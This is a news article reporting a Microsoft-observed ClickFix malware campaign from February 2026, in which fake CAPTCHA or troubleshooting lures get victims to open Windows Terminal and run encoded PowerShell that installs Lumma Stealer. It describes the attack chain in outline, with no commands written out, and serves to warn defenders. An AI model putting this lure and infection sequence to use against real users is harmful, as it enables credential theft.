Users start malware: ClickFix attack campaign relies on Windows Terminal
In ClickFix attacks, victims are supposed to execute commands themselves to infect their systems. One campaign relies on Windows Terminal.
(Image: Skorzewiak/Shutterstock.com)
Microsoft warns of a ClickFix campaign observed in February 2026. It relies on potential victims executing malicious commands in the Windows Terminal.
This is reported by the Microsoft Threat Intelligence Team on Bluesky. According to them, it is a widespread ClickFix campaign that, in February 2026, focuses on starting the Windows Terminal instead of the usual Windows key + “R” process (opens the Windows Run dialog), followed by copying the malicious command and finally executing it.
Malicious Code in Windows Terminal
In the campaign, attackers instruct potential victims to press the Windows key + “X” shortcut and then select “I” there. This starts the Windows Terminal (however, not, as stated by Microsoft, the version with administrator rights, which on German Windows systems at least is accessed via the “a” key). The PowerShell environment is available in the terminal, which is also typically used for administrative tasks.
This approach bypasses detections specifically adapted to the abuse of the “Run” dialog. At the same time, it exploits the familiar environment of the Windows Terminal. Once the terminal is started, attackers instruct victims to execute malicious PowerShell commands. They deliver these commands via fake CAPTCHA pages or through alleged troubleshooting prompts and through lures that resemble common verification mechanisms.
The initial command is hex-encoded and “XOR-compressed,” explain Microsoft's IT researchers. It opens further Windows terminals with PowerShell, which serve to decode the embedded hex commands. These download a legitimate, renamed 7-Zip binary file that unpacks and starts a multi-stage attack chain. This includes additional executable files, scheduled tasks, exceptions for Microsoft Defender, and finally exfiltration of stolen machine and network information. Ultimately, the attack culminates in the installation of Lumma Stealer, which hooks into processes like Chrome and Edge web browsers, searching for web and login data as well as stored credentials, and sending them to the attackers' servers. A second variant uses the “EtherHiding” technique, where a blockchain is used as a command-and-control server and to obfuscate the cyberattack.
Videos by heise
In mid-February, Microsoft's IT security researchers observed a ClickFix variant in which attackers relied on DNS responses. In these responses to internet name resolution requests, they hid the malicious code that leads to the installation of malware.
(dmk)
